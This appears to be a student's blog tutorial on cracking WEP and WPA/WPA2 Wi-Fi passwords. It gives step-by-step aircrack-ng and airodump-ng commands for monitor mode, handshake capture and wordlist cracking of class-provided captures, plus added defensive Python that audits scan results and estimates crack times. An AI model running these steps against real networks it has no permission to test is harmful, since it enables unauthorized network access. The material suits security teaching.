WEP, WPA/WPA2 Wi-Fi Cracking

Abdul Saajid Shaik
5 min read · Feb 5, 2021


Hello Readers

I am Abdul Saajid Shaik, currently studying for the Masters Certificate in Cyber Security by HackerU. This is my first blog, and I want to share what I know about WiFi hacking and the common WEP and WPA/WPA2 attacks: how to crack a WEP or WPA/WPA2 network once you have the captured handshake file, and how to recover the password from that capture.

PS: Don’t do shady work. This is only for educational purposes, and to show how one can keep a WiFi network’s password from being cracked.

Now let’s have some fun without any delay and get our hands dirty.

Link to download KALI Operating System: https://www.kali.org/downloads/

Link to the WiFi adapter I am using for the attack: https://zsecurity.org/product/zsecurity-dual-band-usb-wireless-adapter-2-4-5-ghz-realtek-rtl8812au/

There are many other adapters available in the market!

First we need to set up the WiFi adapter, open a Kali terminal and verify with a few commands that the adapter is working.

Let’s Start the Process

Connect your WiFi adapter and enter the following commands.

If you are using the WiFi adapter for the first time, enter all of the following; otherwise proceed from Step 3.

1) sudo apt-get install realtek-rtl88xxau-dkms // To install the required drivers
2) reboot // To restart the machine
3) iwconfig // To list wireless interfaces and check that the adapter is detected
4) ifconfig wlan0 down // To bring the wlan0 interface down
5) airmon-ng check kill // To kill any processes that could interfere with monitor mode
6) iwconfig wlan0 mode monitor // To change the mode from Managed to Monitor so that we can capture traffic
7) ifconfig wlan0 up // To bring the wlan0 interface up
8) airmon-ng start wlan0 // To enable monitor mode through airmon-ng; its output also shows the adapter’s driver and status. If it renames the interface (for example to wlan0mon), use that name in the following commands
9) airodump-ng wlan0 // To scan for nearby WiFi networks
Adapter Check and Scanning of WiFi networks.

Description

BSSID is the MAC address of the access point.

PWR is the signal strength.

Beacons is the number of announcement (beacon) frames sent by the access point.

Data is the number of captured data packets.

#/s is the number of data packets per second, measured over the last 10 seconds.

MB is the maximum speed supported by the access point.

ENC is the encryption used.

CIPHER is the cipher detected by the adapter.

AUTH is the authentication protocol in use.

ESSID is the name of the WiFi network.

Now that we know what every field means, we can go ahead with the attack. We pick one target network from the list and try to capture its WPA handshake:

airodump-ng wlan0 --bssid 04:XX:XX:XX:XX:31 -c 4 --write wifi.cap

Description

--bssid MAC address of the access point

-c Channel to capture on (the target’s channel, 4 here)

--write Prefix for the dump files

wifi.cap is that prefix; airodump-ng appends a counter and extension, so the handshake is saved in wifi.cap-01.cap

Now we can use the captured handshake file, wifi.cap-01.cap, to crack the password.
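As an added example (not from the original post): alongside the capture, airodump-ng’s --write also produces a CSV (wifi.cap-01.csv) with the same ENC/CIPHER/AUTH columns described above. The script below reads that CSV from the defender’s side and flags the networks that a scan shows still running open, WEP or TKIP. The header is airodump-ng’s real column layout; the rows, BSSIDs and ESSIDs are constructed.

```python
import csv
import io

# Constructed sample of the CSV that airodump-ng writes beside the capture when
# --write is used (wifi.cap-01.csv). The header is airodump-ng's real column
# order; every row, BSSID and ESSID below is made up for this example.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
04:AA:BB:CC:DD:31, 2021-02-05 10:00:01, 2021-02-05 10:05:12,  4,  54, WPA2, CCMP, PSK, -52,  120,   35,   0.  0.  0.  0,   7, HomeNet,
10:AA:BB:CC:DD:02, 2021-02-05 10:00:03, 2021-02-05 10:05:10,  6,  54, WEP, WEP, , -70,   80, 4100,   0.  0.  0.  0,   6, OldCam,
1C:AA:BB:CC:DD:9F, 2021-02-05 10:00:04, 2021-02-05 10:05:11, 11,  54, OPN, , , -61,   60,    0,   0.  0.  0.  0,   8, CafeFree,
2C:AA:BB:CC:DD:44, 2021-02-05 10:00:06, 2021-02-05 10:05:09,  1, 130, WPA2, TKIP, PSK, -80,   30,   12,   0.  0.  0.  0,   5, Shop1,
3C:AA:BB:CC:DD:55, 2021-02-05 10:00:07, 2021-02-05 10:05:08, 36, 866, WPA3, CCMP, SAE, -45,  200,    0,   0.  0.  0.  0,   9, CorpGuest,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:11:22:33:44:55, 2021-02-05 10:00:10, 2021-02-05 10:05:00, -60,  15, 04:AA:BB:CC:DD:31,
"""

SEVERITY = ["CRITICAL", "HIGH", "MEDIUM", "LOW", "INFO"]

def parse_access_points(text):
    """Access-point rows from the first CSV section; a blank line separates
    it from the station section, which is not needed here."""
    rows = csv.reader(io.StringIO(text.strip().split("\n\n")[0]))
    header = [c.strip() for c in next(rows)]
    return [dict(zip(header, (c.strip() for c in row))) for row in rows]

def rate(ap):
    """Turn the ENC / CIPHER / AUTH columns into a finding, worst case first."""
    enc, cipher, auth = ap["Privacy"], ap["Cipher"], ap["Authentication"]
    if enc in ("OPN", ""):
        return "CRITICAL", "open network, traffic is unencrypted"
    if "WEP" in enc:
        return "CRITICAL", f"WEP, key recoverable from traffic ({ap['# IV']} IVs seen)"
    if "TKIP" in cipher or enc == "WPA":
        return "HIGH", "WPA/TKIP, deprecated cipher"
    if "WPA3" in enc or auth == "SAE":
        return "INFO", "WPA3 SAE, resists offline dictionary attacks"
    if auth == "MGT":
        return "LOW", "WPA2 Enterprise, strength depends on the EAP method"
    return "MEDIUM", f"{enc} {auth}, only as strong as the passphrase"

def audit(text):
    """Findings as (severity, essid, bssid, reason), most severe first."""
    findings = []
    for ap in parse_access_points(text):
        severity, reason = rate(ap)
        findings.append((severity, ap["ESSID"], ap["BSSID"], reason))
    return sorted(findings, key=lambda f: SEVERITY.index(f[0]))
```

Calling audit(SAMPLE_CSV) returns the findings most severe first; pass the text of your own wifi.cap-01.csv instead to audit a real scan.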

To crack the WPA handshake in that file and get the password, we use another utility from the suite, aircrack-ng:

aircrack-ng -w wordlist.txt wifi.cap-01.cap

Description

-w specifies the wordlist file of candidate passwords

wordlist.txt is the wordlist of passwords we use to crack the handshake file.

wifi.cap-01.cap is the capture file to crack.

Below I will be using a few already captured handshake files shared in my class, as hacking someone else’s WiFi is a crime.

WEP Password Cracking:-

aircrack-ng {captured_handshake_file}

aircrack-ng wep_exercise5-01.cap

Cracking hash file of WEP Password WiFi Network

Here we use a brute-force attack, and if it is successful we get the password. We were able to crack the password, which is namejamesbond.

The time will vary with the key complexity; you need to wait and watch.

WPA/WPA2 Password Cracking:-

aircrack-ng -w {word_list} {captured_handshake_file}

aircrack-ng -w myowndict.txt wpa_exercise1-01.cap

Cracking hash file of WPA Password WiFi Network

In the above example we used the wordlist named myowndict.txt to crack the password for the cap file named wpa_exercise1-01.cap. We use a brute-force attack, and if it is successful we get the password. We were able to crack the password, which is HappyMan.

The time will vary with the key complexity; you need to wait and watch.

This is the simple process of cracking WiFi passwords.

We have different security protocols available:-

List of the security protocols (ordered from most secure to least secure):

1. WPA3

2. WPA2 Enterprise

3. WPA2 Personal

4. WEP

5. Open Network (no security implemented).

Comparing different WiFi security protocols.

For detailed information on the security protocols, which types are available and which is best, see https://www.netspotapp.com/wifi-encryption-and-security.html

Not every WiFi network can be cracked in practice; passwords of different complexity take different amounts of time to crack.

Here is a table that shows the time it may take to crack a password depending on its complexity and the hardware used for cracking.

Source: https://asecuritysite.com/encryption/passes
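As an added example (not the original post’s table or code), the following estimates the same thing from the defender’s side: every WPA2 guess costs 4096 rounds of PBKDF2-HMAC-SHA1 to derive the PMK, so measuring that cost on the local machine gives a worst-case exhaustion time per password policy. The GPU rate is an assumed round figure, not a measurement; the known-answer check uses the IEEE 802.11i test vector.

```python
import hashlib
import time

WPA2_ITERATIONS = 4096  # PBKDF2-HMAC-SHA1 rounds fixed by IEEE 802.11i for the PMK

def derive_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32 bytes). Every guess a
    wordlist attack on a captured handshake makes has to pay for this."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               WPA2_ITERATIONS, 32)

def measure_guess_rate(ssid="IEEE", seconds=0.5):
    """PMK derivations per second on one CPU core of this machine."""
    n, start = 0, time.perf_counter()
    while time.perf_counter() - start < seconds:
        derive_pmk(f"guess{n}", ssid)
        n += 1
    return n / (time.perf_counter() - start)

def keyspace(charset_size, length):
    return charset_size ** length

def seconds_to_exhaust(charset_size, length, guesses_per_second):
    # Worst case: every candidate of this policy tried at the given rate.
    return keyspace(charset_size, length) / guesses_per_second

def human(seconds):
    for unit, size in (("years", 365 * 86400), ("days", 86400), ("hours", 3600)):
        if seconds >= size:
            return f"{seconds / size:,.1f} {unit}"
    return f"{seconds:,.1f} seconds"

# Rows of a time-to-crack table: policy name -> (alphabet size, length)
POLICIES = {
    "8 lowercase letters": (26, 8),
    "8 letters and digits": (62, 8),
    "16 printable ASCII": (95, 16),
}

def table(guesses_per_second):
    return {name: human(seconds_to_exhaust(c, n, guesses_per_second))
            for name, (c, n) in POLICIES.items()}

if __name__ == "__main__":
    # Known-answer check: IEEE 802.11i test vector, passphrase "password", SSID "IEEE"
    assert derive_pmk("password", "IEEE").hex().startswith("f42c6fc52df0ebef")
    cpu = measure_guess_rate()
    # ASSUMED comparison figure: one high-end GPU on the order of 10^6 guesses/s
    for rate, label in ((cpu, f"CPU {cpu:,.0f}/s"), (1_000_000, "GPU 1e6/s")):
        for name, eta in table(rate).items():
            print(f"{label:16} {name:22} {eta}")
```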

I hope this blog helps you understand how WiFi passwords are cracked, and how one can keep a WiFi password safe by increasing its complexity.

Happy Hacking!

Any Questions or Suggestions feel free to reach-out!
